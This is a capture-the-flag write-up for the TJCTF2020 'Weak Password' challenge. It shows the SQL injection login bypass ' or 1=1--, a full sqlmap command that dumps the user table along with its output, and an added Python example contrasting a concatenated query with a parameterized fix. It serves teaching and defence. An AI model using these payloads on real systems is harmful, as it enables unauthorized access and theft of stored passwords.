TJCTF2020 - Weak Password
Posted on Tue. 02 June 2020 in CTF
Solves: 204
Points: 20
Written by saisree
It seems your login bypass skills are now famous! One of my friends has given you a challenge: figure out his password on this site. He's told me that his username is admin, and that his password is made up of only lowercase letters and numbers. (Wrap the password with tjctf{...})
We have a standard login page with two fields: username and password. We need to recover the admin flag.
Let's try a standard SQLi payload: ' or 1=1--
We are logged in, so the login form is vulnerable. This time, I used sqlmap to dump the table and get the password:
sqlmap https://weak_password.tjctf.org/login --method=POST --data "username=admin&password=admin" -p "password" --not-string="Wrong" --user-agent "Mozilla/5.0 (X11; Linux x86_64; rv:75.0) Gecko/20100101 Firefox/75.0" --tamper=space2comment --level 5 --risk 3 --tables --dump -T userandpassword
Database: SQLite_masterdb
Table: userandpassword
[6 entries]
+----+-----------------------+---------------------+
| id | password | username |
+----+-----------------------+---------------------+
| 1 | blindsqli14519 | admin |
| 2 | random_passwd | random_user |
| 3 | evenmorerandom_passwd | evenmorerandom_user |
| 4 | blindsqli14519 | admin |
| 5 | random_passwd | random_user |
| 6 | evenmorerandom_passwd | evenmorerandom_user |
+----+-----------------------+---------------------+
We got the flag: tjctf{blindsqli14519}
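Why the ' or 1=1-- input logs in, and how a parameterized query closes the hole, shown as an added example that is not the challenge's own code. The server-side query shape and the function names are assumptions; only the table and column names come from the dump above, and the rows are constructed.

```python
import sqlite3


def make_db():
    # Constructed in-memory SQLite database reusing the table/column names
    # from the dump; the stored password is a placeholder, not the real one.
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE userandpassword "
        "(id INTEGER PRIMARY KEY, password TEXT, username TEXT)"
    )
    db.executemany(
        "INSERT INTO userandpassword (password, username) VALUES (?, ?)",
        [("constructed_admin_pw", "admin"), ("random_passwd", "random_user")],
    )
    return db


def login_vulnerable(db, username, password):
    # Assumed server-side pattern: form fields concatenated into the SQL text,
    # so a quote in the input ends the string literal and the rest is parsed
    # as SQL. AND binds tighter than OR, so "or 1=1" matches every row.
    query = (
        "SELECT username FROM userandpassword "
        "WHERE username = '" + username + "' AND password = '" + password + "'"
    )
    return db.execute(query).fetchone() is not None


def login_parameterized(db, username, password):
    # Hardened form: placeholders bind the input as data, never as SQL syntax.
    query = (
        "SELECT username FROM userandpassword "
        "WHERE username = ? AND password = ?"
    )
    return db.execute(query, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    payload = "' or 1=1--"  # the input tried in the write-up
    for check in (login_vulnerable, login_parameterized):
        print(check.__name__, "accepts payload:", check(db, "admin", payload))
```

The true/false login response of the vulnerable form is the same signal sqlmap's --not-string="Wrong" option keys on; with bound parameters that response no longer depends on SQL supplied in the field.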